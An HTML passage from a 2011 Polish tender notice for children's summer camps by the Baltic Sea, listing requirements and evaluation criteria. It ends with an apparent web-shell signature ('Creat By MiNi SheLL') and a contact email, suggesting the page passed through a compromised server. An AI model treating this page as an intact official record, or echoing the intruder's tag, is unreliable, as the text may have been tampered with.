- Zamawiający zastrzega sobie możliwość rezygnacji z ilości wykupionych skierowań do 20%  w terminie do 14 dni przed rozpoczęciem turnusu;
- W terminie do 7 dni przed rozpoczęciem turnusu należy dostarczyć Zamawiającemu kserokopie potwierdzenia złożenia wniosku o wydanie zezwolenia przez właściwy oddział Kuratorium Oświaty, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz.U. z1997r., nr 12, poz.67);
- Cena organizowanych wycieczek i imprez musi obejmować wszystkie koszty ich realizacji.  W cenę należy wliczyć wszystkie bilety wstępu, koszty przewodnika i inne;
- W terminie do 7 dni przed rozpoczęciem turnusu należy dostarczyć Zamawiającemu kserokopie potwierdzenia złożenia wniosku o wydanie zezwolenia przez właściwy oddział Kuratorium Oświaty, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz.U. z1997r., nr 12, poz.67);
- Ponadto Wykonawca zabezpiecza: wykwalifikowaną kadrę wychowawczą, pełną opiekę medyczną przy czym wszelkie koszty związane z zapewnieniem należytej opieki medycznej łącznie z kosztami leków podstawowej opieki medycznej (nie dotyczy leków przyjmowanych przez dziecko stale) obciążają organizatora kolonii, zabezpieczenie opieki ratownika w czasie kąpieli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Warunki socjalno-bytowe - 30</li>
<li>3. Zakres programu - 20</li>
<li>4. Atrakcyjność profilu kolonii - indywidualna ocena członków Komisji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zorganizowanie kolonii dla dzieci w wieku 8-15 lat nad Morzem Bałtyckim (jednostka zlecająca: Dział Zarządzania Kadrami w Krośnie).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka części nr 3 zamówienia - wymagania:
a) Miejscowość: nadmorska nad Morzem Bałtyckim (oprócz takich miejscowości jak: Sianożęty, Łazy i Sztutowo - wymienione miejscowości leżą poza kręgiem zainteresowania Zamawiającego, ze względu na organizację w ostatnim okresie w tych miejscowościach wypoczynku dla dzieci dla jednostki zlecającej DZK w Krośnie);
b) Turnus: 14 dniowy tj. 13 noclegów. Termin (w okresie pomiędzy): 01.07.2011 r. - 15.08.2011 r. - jeden turnus;
c) Warunki socjalno-bytowe: Wykonawca opisze miejscowość, w której znajduje się proponowany obiekt, jego otoczenie i położenie, wyposażenie, wielkość i wyposażenie pokoi, sanitariaty, stołówka, świetlica własna czy wynajmowana w innym obiekcie (odległość), zaplecze sportowo-rekreacyjne (boiska do siatkówki, koszykówki, piłki nożnej, korty tenisowe) własne czy wynajmowane w innym ośrodku (odległość) oraz zaopatrzenie w sprzęt sportowy. Mile widziana prezentacja fotograficzna. Przedmiotowy opis wykonawca dołączy do oferty;
d) Wyżywienie: 4 posiłki dziennie: śniadanie, dwudaniowy obiad, podwieczorek, kolacja plus dodatkowe wyżywienie w formie szwedzkiego stołu po godz. 20:00 wg zapotrzebowania uczestników kolonii, na drogę powrotną suchy prowiant (2 bułki z masłem i serem żółtym, drożdżówka, jabłko, batonik, woda mineralna 0,5 l). Woda do picia dostępna na obiekcie wypoczynku przez cały okres trwania kolonii. Stawka żywieniowa dzienna na jednego uczestnika powinna wynosić nie mniej niż 40,00 złotych a wsad do kotła - nie mniej niż 20,00 zł. Pierwszy posiłek uzależniony od godziny przyjazdu do ośrodka wypoczynku;
e) Transport: autokar klasy LUX (z WC i klimatyzacją) umożliwiający przejazd uczestników kolonii z miejsca wyznaczonego przez zamawiającego do miejsca wypoczynku i z powrotem oraz zapewnienie opieki kadry wychowawców w czasie przejazdu. Ze względu na obszar działania oraz miejsce zamieszkania dzieci uczestniczących w kolonii zamawiający może zgłosić konieczność podstawienia autokaru w Sanoku oddalonym od Krosna o ok. 40 km.
f) Program dydaktyczno-wychowawczy: Wykonawca opisze program autorski w zakresie organizacji imprez sportowo-rekreacyjno-turystycznych, kulturalno-oświatowych, który dołączy do oferty. (UWAGA: W ofercie Wykonawca opisze program dydaktyczno - wychowawczy, w którym należy uwzględnić m. in. profil kolonii, ilość i tematykę organizowanych wycieczek autokarowych, pieszych, imprez rekreacyjno-sportowo-turystycznych, program na niepogodę i inne);
g) Ubezpieczenie: NNW;
h) Kadra:  wychowawczo-pedagogiczna, medyczna, ratownik;
i) Inne:  opłaty klimatyczne, drogowe, parkingowe;
j) Ilość uczestników: przewidywana ilość uczestników: 57 osób;
k) Dodatkowe wymagania i zastrzeżenia:
- Zamawiający zastrzega sobie możliwość rezygnacji z ilości wykupionych skierowań do 20%  w terminie do 14 dni przed rozpoczęciem turnusu;
- w terminie do 7 dni przed rozpoczęciem turnusu należy dostarczyć Zamawiającemu kserokopie potwierdzenia złożenia wniosku o wydanie zezwolenia przez właściwy oddział Kuratorium Oświaty, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz.U. z1997r., nr 12, poz.67);
- Cena organizowanych wycieczek oraz imprez musi obejmować wszystkie koszty ich realizacji. W cenę należy wliczyć wszystkie bilety wstępu, koszty przewodnika i inne; 
- W zakresie dodatkowego wyżywienie szwedzkiego stołu - wykonawca powinien zabezpieczyć uczestnikom wypoczynku dodatkowe wyżywienie w godz. 20:00-21:30 poprzez udostępnienie im produktów np.: pieczywo, dżem, miód, serki topione, twarożek opakowany hermetycznie, wędlina opakowana hermetycznie, ser żółty opakowany hermetycznie, krem np. nutella, jogurt. Dopuszcza się możliwość przygotowania przedmiotowego posiłku bezpośrednio przez wychowawców grup. Nie wymaga się aby przedmiotowy posiłek był podany na stołówce - dopuszcza się możliwość przygotowania posiłku np. na świetlicy z zastrzeżeniem zachowania zasad higieny.
- Ponadto Wykonawca zabezpiecza: wykwalifikowaną kadrę wychowawczą, pełną opiekę medyczną przy czym wszelkie koszty związane z zapewnieniem należytej opieki medycznej łącznie z kosztami leków podstawowej opieki medycznej (nie dotyczy leków przyjmowanych przez dziecko stale) obciążają organizatora kolonii, zabezpieczenie opieki ratownika w czasie kąpieli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Warunki socjalno-bytowe - 30</li>
<li>3. Zakres programu - 20</li>
<li>4. Atrakcyjność profilu kolonii - indywidualna ocena członków Komisji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com